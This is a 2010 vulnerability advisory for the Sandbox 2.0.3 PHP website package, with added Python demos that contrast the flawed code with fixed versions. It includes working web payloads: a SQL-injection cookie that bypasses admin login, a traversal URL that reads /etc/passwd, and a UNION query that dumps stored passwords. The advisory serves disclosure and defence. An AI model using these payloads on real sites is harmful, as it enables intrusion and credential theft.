ID SSV:19911 Type seebug Reporter Root Modified 2010-07-07T00:00:00
Sandbox 2.0.3 Multiple Remote Vulnerabilities
Name Sandbox
Vendor http://www.iguanadons.net
Versions Affected 2.0.3
Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2010-07-07
X. INDEX
I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
I. ABOUT THE APPLICATION
________________________
Sandbox is a personal website package that provides you
with a blog, image gallery, file downloads area, and the
ability to create miscellaneous custom webpages.
II. DESCRIPTION
_______________
Several request parameters are not sanitised before being
used in SQL queries and in dangerous PHP functions.
The vulnerabilities are reported in version 2.0.3. Other
versions may also be affected.
III. ANALYSIS
_____________
Summary:
A) Authentication Bypass
B) Arbitrary File Upload
C) Local File Inclusion
D) SQL Injection
A) Authentication Bypass
________________________
The value of the sandbox_pass cookie is used in a SQL query
in global.php without being sanitised. Since that query
implements the authentication check, the injection can be
used to bypass it.
Successful exploitation requires that "magic_quotes_gpc"
is disabled: with it enabled, the single quote in the
payload is escaped before it reaches the query.
B) Arbitrary File Upload
________________________
When a file is uploaded through blog.php (and also through
profile.php) the extension check is flawed. The file name
is split on the dot character and only the second element
is compared against the white list. This works for a file
with a single extension, but for a file with two extensions
only the element immediately after the first dot is
examined, so anything that follows it is ignored. The
following is the affected code in blog.php:
$fname = $this->files['image_file']['tmp_name'];
$system = explode( '.', $this->files['image_file']['name'] );
$system[1] = strtolower($system[1]);
if ( !preg_match( '/jpg|jpeg|png|gif/', $system[1] ) ) {
NO UPLOAD
} else {
UPLOAD
}
If the file's name is evil.jpg.php: $system[1] = jpg, so
the check passes. Note also that the pattern is not
anchored, so a second element that merely contains one of
the listed strings (for example phpjpg) also passes.
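The flawed check above, re-implemented in Python next to a hardened version, as an added example (this is not Sandbox code). The flawed function mirrors the PHP excerpt exactly (split on '.', inspect only the second element, unanchored match). The hardened function takes only the last extension, requires a whole-string match, checks the file's leading bytes against the expected image signature, and generates the storage name server-side; the signature table and the random-name scheme are choices made for this example.

```python
import os
import re
import secrets

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Leading bytes of the accepted formats (JPEG SOI, PNG signature, GIF header).
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def flawed_check(filename: str) -> bool:
    """Mirror of blog.php: only the element after the first dot is inspected."""
    parts = filename.split(".")
    if len(parts) < 2:
        # PHP: $system[1] is undefined, strtolower(NULL) gives '' and the
        # preg_match fails, so a name without a dot is rejected.
        return False
    second = parts[1].lower()
    # preg_match('/jpg|jpeg|png|gif/', ...) has no anchors: a substring match is enough.
    return re.search(r"jpg|jpeg|png|gif", second) is not None


def hardened_check(filename: str, data: bytes):
    """Return a safe storage name, or None if the upload must be rejected.

    Only the *last* extension counts, it must equal an allow-list entry, the
    content must start with that format's signature, and the stored name is
    generated here so the client-supplied name (with any extra extensions in
    it) never reaches the filesystem.
    """
    base = os.path.basename(filename)
    root, ext = os.path.splitext(base)
    ext = ext.lstrip(".").lower()
    if not root or ext not in ALLOWED_EXTENSIONS:
        return None
    if not data.startswith(MAGIC[ext]):
        return None
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16        # constructed PNG header
    for name in ("photo.jpg", "evil.jpg.php", "evil.phpjpg", "evil.php"):
        print(f"{name:14s} flawed check passes: {flawed_check(name)}")
    print("hardened, evil.jpg.php:", hardened_check("evil.jpg.php", b"<?php ?>"))
    print("hardened, photo.PNG:  ", hardened_check("photo.PNG", png))
```

The signature check is a second line of defence, not a replacement for the extension rule: a file may carry a valid image header and still contain PHP code further in, so the generated name (never client-controlled) and a storage location the web server does not execute scripts from are what actually keep an upload from running.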
C) Local File Inclusion
_______________________
The a parameter in admin.php is not properly sanitised
before being used in PHP's require() function. This can be
exploited to include arbitrary local files via directory
traversal, with a URL-encoded NULL byte (%00) cutting off
whatever the script appends after the parameter. The NULL
byte truncation depends on the PHP version: PHP 5.3.4 and
later reject paths that contain a NULL byte.
D) SQL Injection
________________
The p parameter in modules/page.php is not properly
sanitised before being used in a SQL query. This can be
exploited to inject arbitrary SQL; the UNION-based sample
below reads user names and passwords from the sb_users
table. That payload contains no quote characters (0x3a
stands in for ':'), so magic_quotes_gpc does not interfere
with it.
IV. SAMPLE CODE
_______________
A) Authentication Bypass
cookie: sandbox_pass = 1' OR '1'='1'#
cookie: sandbox_user = userid (1 for admin)
B) Arbitrary File Upload
Upload a file with a double extension.
C) Local File Inclusion
http://site/path/admin.php?a=../../../../../../../etc/passwd%00
D) SQL Injection
http://site/path/index.php?a=page&p=-1 UNION SELECT 1,2,3,4,5,6,7,CONCAT(user_name,0x3a,user_password) FROM sb_users
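The two injection points from sections A and D, simulated against an in-memory SQLite database, as an added example (this is not Sandbox code). The table layout, the eight-column page table and the exact query shapes are assumptions made for the demo, since the advisory does not print the queries. The payloads are the advisory's, rewritten in SQLite syntax: MySQL's "#" comment becomes "--" and CONCAT(user_name,0x3a,user_password) becomes user_name||':'||user_password; the injection mechanics are identical.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two users and one page with eight columns."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE sb_users (user_id INTEGER, user_name TEXT, user_password TEXT);
        INSERT INTO sb_users VALUES (1, 'admin', 'hash_of_admin_pw');
        INSERT INTO sb_users VALUES (2, 'bob',   'hash_of_bob_pw');
        CREATE TABLE sb_pages (page_id INTEGER, title TEXT, c3 TEXT, c4 TEXT,
                               c5 TEXT, c6 TEXT, c7 TEXT, body TEXT);
        INSERT INTO sb_pages VALUES (1, 'Home', '', '', '', '', '', 'Welcome');
    """)
    return db


# Section A: cookie values dropped straight into the WHERE clause (global.php).
def login_vulnerable(db, cookie_user: str, cookie_pass: str):
    sql = ("SELECT user_id, user_name FROM sb_users "
           f"WHERE user_id = '{cookie_user}' AND user_password = '{cookie_pass}'")
    return db.execute(sql).fetchone()


def login_fixed(db, cookie_user: str, cookie_pass: str):
    """Bound parameters: the cookie text can never become SQL syntax."""
    sql = ("SELECT user_id, user_name FROM sb_users "
           "WHERE user_id = ? AND user_password = ?")
    return db.execute(sql, (cookie_user, cookie_pass)).fetchone()


# Section D: numeric p parameter interpolated unquoted (modules/page.php).
def page_vulnerable(db, p: str):
    return db.execute(f"SELECT * FROM sb_pages WHERE page_id = {p}").fetchall()


def page_fixed(db, p: str):
    """A page id is a non-negative integer and nothing else."""
    if not p.isdigit():
        return []
    return db.execute("SELECT * FROM sb_pages WHERE page_id = ?", (int(p),)).fetchall()


# The advisory's payloads in SQLite spelling.
BYPASS_COOKIE = "1' OR '1'='1'--"
UNION_PAYLOAD = ("-1 UNION SELECT 1,2,3,4,5,6,7,user_name||':'||user_password "
                 "FROM sb_users")

if __name__ == "__main__":
    db = make_db()
    # The OR clause makes the WHERE true for every row and the comment
    # swallows the closing quote, so the first user (admin) is returned.
    print("vulnerable login:", login_vulnerable(db, "1", BYPASS_COOKIE))
    print("fixed login:     ", login_fixed(db, "1", BYPASS_COOKIE))
    # page_id = -1 matches nothing; the UNION appends one row per user.
    for row in page_vulnerable(db, UNION_PAYLOAD):
        print("leaked:", row[-1])
    print("fixed page:", page_fixed(db, UNION_PAYLOAD))
```

The UNION payload needs exactly as many columns as the original SELECT returns (eight here, matching the 1..7 plus CONCAT in the advisory); a mismatch produces an error rather than data, which is how an attacker finds the count in the first place. Parameter binding fixes both issues; escaping (what magic_quotes_gpc did) only blocks payloads that need a quote, and the numeric p injection needs none.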
V. FIX
______
No fix.